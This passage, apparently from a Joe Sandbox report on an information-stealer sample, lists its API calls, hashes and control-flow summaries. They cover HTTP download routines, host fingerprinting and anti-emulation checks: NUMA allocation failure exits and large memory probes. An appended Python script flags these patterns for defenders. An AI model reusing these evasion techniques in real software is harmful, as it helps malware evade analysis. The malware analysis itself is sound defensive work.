                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 781479a5e0167e88777c7e8c4836de415c970ee234007f263a5274255f5dbf99
                            • Instruction ID: 14aeec10cca2944a4a313889752d19c788cf4d1c78f383954481a61d6e2a31c2
                            • Opcode Fuzzy Hash: 781479a5e0167e88777c7e8c4836de415c970ee234007f263a5274255f5dbf99
                            • Instruction Fuzzy Hash: 91A23E709017068FCB20DF69D958AAABBF5EF44314F5884B9E809DB3A1DB35DC86CB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20013
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B200BD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B200E1
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B200EC
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20110
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B2011B
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2013F
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B2015A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20189
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B20194
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B201C3
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B201CE
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20206
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B20250
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B20288
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2059B
                            • lstrlen.KERNEL32(018654E8), ref: 00B205AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B205D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00B205E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2060E
                            • lstrlen.KERNEL32(0187EE70), ref: 00B20625
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00B20658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B20681
                            • lstrlen.KERNEL32(01865628), ref: 00B20698
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B206C9
                            • lstrcat.KERNEL32(00000000,?), ref: 00B206D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B20706
                            • lstrcpy.KERNEL32(00000000,018788C8), ref: 00B2074B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B2077F
                            • lstrcpy.KERNEL32(00000000,0187EC90), ref: 00B207E7
                            • lstrcpy.KERNEL32(00000000,01878AB8), ref: 00B20858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00B208CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B20928
                            • lstrcpy.KERNEL32(00000000,01878C38), ref: 00B209F8
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B02528
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B0254E
                              • Part of subcall function 00B024E0: lstrcpy.KERNEL32(00000000,?), ref: 00B02577
                            • lstrcpy.KERNEL32(00000000,01878B28), ref: 00B20ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B20B81
                            • lstrcpy.KERNEL32(00000000,01878B28), ref: 00B20D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: afba1c850382a596ca2f913b9396ad7e681534a5eab200a8d58b2caed7f22121
                            • Instruction ID: 1c94f2c7c07dfe7122a8379250687fe2527ed9156722c787acb4a76929d572d0
                            • Opcode Fuzzy Hash: afba1c850382a596ca2f913b9396ad7e681534a5eab200a8d58b2caed7f22121
                            • Instruction Fuzzy Hash: BEE24B70A053518FD724EF29D488B5ABBE1FF88314F5889ADE44D8B3A2DB31D845CB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 b06c40-b06c64 call b02930 2237 b06c75-b06c97 call b04bc0 2234->2237 2238 b06c66-b06c6b 2234->2238 2242 b06c99 2237->2242 2243 b06caa-b06cba call b02930 2237->2243 2238->2237 2239 b06c6d-b06c6f lstrcpy 2238->2239 2239->2237 2244 b06ca0-b06ca8 2242->2244 2247 b06cc8-b06cf5 InternetOpenA StrCmpCA 2243->2247 2248 b06cbc-b06cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 b06cf7 2247->2249 2250 b06cfa-b06cfc 2247->2250 2248->2247 2249->2250 2251 b06d02-b06d22 InternetConnectA 2250->2251 2252 b06ea8-b06ebb call b02930 2250->2252 2253 b06ea1-b06ea2 InternetCloseHandle 2251->2253 2254 b06d28-b06d5d HttpOpenRequestA 2251->2254 2261 b06ec9-b06ee0 call b02a20 * 2 2252->2261 2262 b06ebd-b06ebf 2252->2262 2253->2252 2256 b06d63-b06d65 2254->2256 2257 b06e94-b06e9e InternetCloseHandle 2254->2257 2259 b06d67-b06d77 InternetSetOptionA 2256->2259 2260 b06d7d-b06dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 b06dd4-b06de4 call b23d90 2260->2263 2264 b06daf-b06dd3 call b271e0 call b02a20 * 2 2260->2264 2262->2261 2265 b06ec1-b06ec3 lstrcpy 2262->2265 2263->2264 2275 b06de6-b06de8 2263->2275 2265->2261 2277 b06e8d-b06e8e InternetCloseHandle 2275->2277 2278 b06dee-b06e07 InternetReadFile 2275->2278 2277->2257 2278->2277 2279 b06e0d 2278->2279 2281 b06e10-b06e15 2279->2281 2281->2277 2283 b06e17-b06e3d call b27310 2281->2283 2286 b06e44-b06e51 call b02930 2283->2286 2287 b06e3f call b02a20 2283->2287 2291 b06e61-b06e8b call b02a20 InternetReadFile 2286->2291 2292 b06e53-b06e57 2286->2292 2287->2286 2291->2277 2291->2281 2292->2291 2293 b06e59-b06e5b lstrcpy 2292->2293 2293->2291
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06C6F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06CC2
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B06CD5
                            • StrCmpCA.SHLWAPI(?,0187F178), ref: 00B06CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,0187EE10,00000000,00000000,-00400100,00000000), ref: 00B06D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00B06D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00B06DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B06DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00B06E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00B06E8E
                            • InternetCloseHandle.WININET(?), ref: 00B06E98
                            • InternetCloseHandle.WININET(00000000), ref: 00B06EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B06EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: e98d8f23702e8777997bb3541f7c984b8855c7e310837ce140ea11f5c14da4d6
                            • Instruction ID: fc4de1b1df46adc70cd4cf7a49288f1623cf063053ac0904743308bbcb683a84
                            • Opcode Fuzzy Hash: e98d8f23702e8777997bb3541f7c984b8855c7e310837ce140ea11f5c14da4d6
                            • Instruction Fuzzy Hash: EE815075A41315ABEB20DFA4DC49BAEBBF8EF44700F1441A8F905E72C0DB70AD458BA0
                            APIs
                            • lstrlen.KERNEL32(01865608), ref: 00B1F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F47B
                            • lstrcpy.KERNEL32(00000000,01865608), ref: 00B1F4BB
                            • lstrcpy.KERNEL32(00000000,018788E8), ref: 00B1F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B1F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1F718
                            • lstrlen.KERNEL32(01878A68), ref: 00B1F746
                            • lstrcpy.KERNEL32(00000000,01878A68), ref: 00B1F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1FA32
                            • lstrlen.KERNEL32(018788B8), ref: 00B1FA60
                            • lstrcpy.KERNEL32(00000000,018788B8), ref: 00B1FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1FAFE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 47998fde45ddf094a6d447e3d19f030fbc4128c8d7c4eb054056030fac9b8b6f
                            • Instruction ID: 53c1ea1a9af490b363c45d33ba5f38b9854dc98435f32aaa0e90bdde5e88d58f
                            • Opcode Fuzzy Hash: 47998fde45ddf094a6d447e3d19f030fbc4128c8d7c4eb054056030fac9b8b6f
                            • Instruction Fuzzy Hash: 25F10770A01702CFDB24CF69D898AAAB7E5FF44314B5881BAD809DB3A1D775DC82CB50

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image with executed and not-executed blocks coloured)
                            • Entry block b18ca0-b18cc4 calls StrCmpCA. One edge leads straight to ExitProcess at b18cc6; the other enters a loop (b18cf3 → b18cf6) whose dispatcher at b18cff fans out to thirteen comparison blocks: StrCmpCA at b18d84, b18da4, b18dbd, b18ddd, b18dfd, b18e1d, b18e3d, b18e56 and b18e6f, and lstrlen at b18d06, b18d30, b18d5a and b18e88. The lstrlen blocks continue into calls to b02a20 and b02930 and, through b18eb3-b18ebd, at most one lstrcpy; every path rejoins at b18ec3-b18edc, and the function leaves through b18ee2-b18eef (call b02a20).
                            • The Similarity entry below gives ExitProcess as the API ID and "block" as the String ID, so the StrCmpCA at the entry whose one outcome is an immediate ExitProcess is consistent with terminating the process when the compared string equals "block".
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3f6630df1525520de12c673d03c3e0b07fa1a028baa3ea40a815c7b84e815511
                            • Instruction ID: 362018c74a3582c5e5a305a2c6a02176fb00971a3843dae2d4ba369d393238bd
                            • Opcode Fuzzy Hash: 3f6630df1525520de12c673d03c3e0b07fa1a028baa3ea40a815c7b84e815511
                            • Instruction Fuzzy Hash: EC516D72A04701DBC7209F75DD88ABBBBF4FF44700B9048ADE442D6650DBB8E9859B61

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • b22740-b22783 GetWindowsDirectoryA → b2278c-b227ea GetVolumeInformationA (b22785 is a one-block side path on one of the two edges) → byte loop b227ec/b227f4 → b22809-b22820 GetProcessHeap, RtlAllocateHeap → b22826-b22844 wsprintfA when the allocation succeeded (b22822 otherwise) → b2285b-b22872 call b271e0.
                            • In the GetVolumeInformationA call listed below, lpVolumeSerialNumber (fourth argument, 00B193B6) is the only non-NULL output pointer; the volume-name, maximum-component-length, file-system-flags and file-system-name parameters are all 0, so the call retrieves nothing but the volume serial number. The root path passed as lpRootPathName is not resolved in the report ("?"); the function references the strings ":\" and "C" and obtains the Windows directory with uSize 0x104 = MAX_PATH. This is consistent with deriving a host identifier from the system drive's volume serial; the wsprintfA format string is not recovered in the report.
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00B2277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00B193B6,00000000,00000000,00000000,00000000), ref: 00B227AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22816
                            • wsprintfA.USER32 ref: 00B2283B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: d38f1eee9b5fd78c85fcda16ad5ee2259c11064d062441afefbc2b861d23129a
                            • Instruction ID: 21417c50a8b0c2b0272ece010d9a0bbec14d408e9354ed01752b1859c2722690
                            • Opcode Fuzzy Hash: d38f1eee9b5fd78c85fcda16ad5ee2259c11064d062441afefbc2b861d23129a
                            • Instruction Fuzzy Hash: 8D3161B1908219ABCB14CFB899859EFFFBCEF58710F100169E509F7650E6349B408BB1

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • b04bc0-b04bce → small loop b04bd0-b04bd5 → b04bd7-b04c48: three ??2@YAPAXI@Z calls, lstrlen, InternetCrackUrlA, call b02a20.
                            • ??2@YAPAXI@Z is the MSVC-decorated name of operator new(unsigned int); each of the three calls asks for 0x800 (2048) bytes, presumably output buffers for members of the URL_COMPONENTS structure that InternetCrackUrlA fills. The InternetCrackUrlA call passes dwUrlLength 0, which per the documented API means the URL is taken as NUL-terminated rather than bounded by the value the preceding lstrlen computed.
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00B04BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00B04C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00B04C27
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 2d99ea460433aaa5ec985a1176ab342e8172825906669649ac3aa3cba9c22137
                            • Instruction ID: a334544a6a0e7893bb94e099501babdc5e461cfa6d303eb0dd459a870dc6da5d
                            • Opcode Fuzzy Hash: 2d99ea460433aaa5ec985a1176ab342e8172825906669649ac3aa3cba9c22137
                            • Instruction Fuzzy Hash: 6E011B71D00218ABDB10DFA8E845B9EBBA8EB48320F004166F914E7390EF7459058FD4

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • b01030-b01055 GetCurrentProcess, VirtualAllocExNuma → one edge goes straight to ExitProcess at b01057 (presumably the allocation's failure path); the other continues to b0105e-b0107b VirtualAlloc → b0107d (short side block) or b01082 → b0108a-b010ab VirtualFree, taken only when the allocation returned a pointer → b010b1 return.
                            • Decoded arguments (see APIs below): VirtualAllocExNuma asks for 0x7D0 (2000) bytes with 0x3000 = MEM_COMMIT|MEM_RESERVE and 0x40 = PAGE_EXECUTE_READWRITE on NUMA node 0; GetCurrentProcess takes no parameters, so the five values the report prints for it are stack contents, and they line up exactly with the arguments already pushed for the following VirtualAllocExNuma call. VirtualAlloc asks for 0x17C841C0 = 399,000,000 bytes (about 380 MiB) with MEM_COMMIT|MEM_RESERVE and 0x4 = PAGE_READWRITE, and the region is released again with 0x8000 = MEM_RELEASE. Exiting when VirtualAllocExNuma fails, and committing a few hundred MiB only to free it, are well-known probes for emulators that do not implement the NUMA allocation API and for analysis VMs with little RAM.
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                            • ExitProcess.KERNEL32 ref: 00B01058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B0106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00B010AB
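Reading the hex arguments above by hand is error-prone, so the following is an added example, written for this report and not Joe Sandbox or Stealc code, that parses API lines in the format shown, names the VirtualAlloc / VirtualAllocExNuma / VirtualFree parameters with their symbolic flag values, and flags the two evasion shapes in this function: a probe API whose outcome leads straight to ExitProcess, and an allocation request of hundreds of MiB. The sample input is constructed from the five lines above plus two heap calls from the volume-information function as a control. Two things are assumptions rather than report data: the 256 MiB threshold, and the reading of the five values printed for the parameterless GetCurrentProcess as the arguments already pushed for the following VirtualAllocExNuma call (x86 stdcall pushes them before the handle is fetched).

```python
"""Decode the memory-allocation calls listed in a Joe Sandbox 'APIs' block.

Added example for this report; not Joe Sandbox or Stealc code. It parses the
line shape used above ("Name.MODULE(arg,...), ref: ADDR"), names the
VirtualAlloc / VirtualAllocExNuma / VirtualFree arguments with symbolic flag
values, and flags two shapes visible in function b01030.  Assumptions:
LARGE_ALLOC_BYTES is an analyst threshold; recover_numa_args() relies on the
x86 stdcall stack reading described in its docstring.
"""
import re
from dataclasses import dataclass

# Constructed sample: the five lines listed for b01030 plus two heap lines
# from the volume-information function as a non-flagged control.
SAMPLE_LINES = """\
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
• ExitProcess.KERNEL32 ref: 00B01058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B0106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00B010AB
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2280F
• RtlAllocateHeap.NTDLL(00000000), ref: 00B22816
"""

LINE_RE = re.compile(
    r"^[\s•*-]*(?P<api>[\w?@]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
             0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
PROTOTYPES = {  # documented Win32 parameter order
    "VirtualAlloc": ("lpAddress", "dwSize", "flAllocationType", "flProtect"),
    "VirtualAllocExNuma": ("hProcess", "lpAddress", "dwSize", "flAllocationType",
                           "flProtect", "nndPreferred"),
    "VirtualFree": ("lpAddress", "dwSize", "dwFreeType"),
}
# APIs whose outcome sandboxes commonly get wrong; ExitProcess directly after
# one of them is the fail-closed shape seen at 00B0104D -> 00B01058.
PROBE_APIS = {"VirtualAllocExNuma", "VirtualAlloc", "GlobalMemoryStatusEx"}
LARGE_ALLOC_BYTES = 256 * 1024 * 1024  # analyst threshold (assumption)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # ints, or None where the report prints '?'
    ref: int


def parse_api_lines(text):
    """Return an ApiCall for every line in the report's API-list format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if a:
                args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def recover_numa_args(calls):
    """Heuristic (assumption): GetCurrentProcess has no parameters, so the values
    printed for it are stack contents. x86 stdcall pushes VirtualAllocExNuma's
    arguments right-to-left before the handle is fetched, so when the two calls
    are adjacent the printed order is lpAddress..nndPreferred."""
    for prev, cur in zip(calls, calls[1:]):
        if (prev.api == "GetCurrentProcess" and cur.api == "VirtualAllocExNuma"
                and len(prev.args) == 5 and len(cur.args) == 1):
            cur.args = cur.args + prev.args
    return calls


def _flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


def decode_protect(value):
    base = PAGE_PROT.get(value & 0xFF, hex(value & 0xFF))
    return "|".join([base] + [n for bit, n in PAGE_MODIFIERS.items() if value & bit])


def decode_call(call):
    """Name the captured arguments and render flag words symbolically."""
    out = {}
    for name, val in zip(PROTOTYPES.get(call.api, ()), call.args):
        if val is None:
            out[name] = None
        elif name in ("flAllocationType", "dwFreeType"):
            out[name] = _flags(val, MEM_FLAGS)
        elif name == "flProtect":
            out[name] = decode_protect(val)
        else:
            out[name] = val
    return out


def find_evasion_patterns(calls):
    """Return (ref, reason) pairs for probe-then-ExitProcess and oversized allocations."""
    findings = []
    for i, c in enumerate(calls):
        if c.api in PROBE_APIS and i + 1 < len(calls) and calls[i + 1].api == "ExitProcess":
            findings.append((c.ref, f"{c.api} outcome gates ExitProcess at {calls[i + 1].ref:08X}"))
        size = decode_call(c).get("dwSize")
        if c.api.startswith("VirtualAlloc") and isinstance(size, int) and size >= LARGE_ALLOC_BYTES:
            findings.append((c.ref, f"{c.api} requests {size} bytes ({size / 2**20:.0f} MiB)"))
    return findings


if __name__ == "__main__":
    parsed = recover_numa_args(parse_api_lines(SAMPLE_LINES))
    for c in parsed:
        print(f"{c.ref:08X} {c.api:<20} {decode_call(c)}")
    for ref, why in find_evasion_patterns(parsed):
        print(f"FLAG {ref:08X}: {why}")
```

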